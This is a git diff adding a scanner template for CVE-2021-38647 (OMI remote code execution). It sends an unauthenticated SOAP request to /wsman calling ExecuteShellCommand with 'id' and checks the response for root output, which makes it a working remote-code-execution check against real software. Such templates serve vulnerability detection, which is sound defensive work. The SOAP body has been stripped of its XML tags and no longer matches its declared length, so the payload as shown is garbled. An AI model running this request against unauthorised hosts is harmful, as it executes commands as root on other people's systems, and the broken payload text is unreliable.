diff --git a/cves/2021/CVE-2021-38647.yaml b/cves/2021/CVE-2021-38647.yaml
new file mode 100644
index 0000000000..4c499f0b8a
--- /dev/null
+++ b/cves/2021/CVE-2021-38647.yaml
@@ -0,0 +1,57 @@
+id: CVE-2021-38647
+
+info:
+ name: Open Management Infrastructure Remote Code Execution Vulnerability
+ author: daffainfo
+ severity: critical
+ tags: cve,cve2021,rce,omi
+ reference:
+ - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
+ - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647
+
+requests:
+
+ - raw:
+ - |
+ POST /wsman HTTP/1.1
+ Connection: Keep-Alive
+ Content-Length: 1505
+ Content-Type: application/soap+xml;charset=UTF-8
+ Host: {{Hostname}}
+
+
+
+ HTTP://192.168.1.1:5986/wsman/
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem
+
+ http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
+
+ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand
+ 102400
+ uuid:0AB58087-C2C3-0005-0000-000000010000
+ PT1M30S
+
+
+
+
+ root/scx
+
+
+
+
+ id
+ 0
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "uid=0(root) gid=0(root) groups=0(root)"
+ part: body
+
+ - type: status
+ status:
+ - 200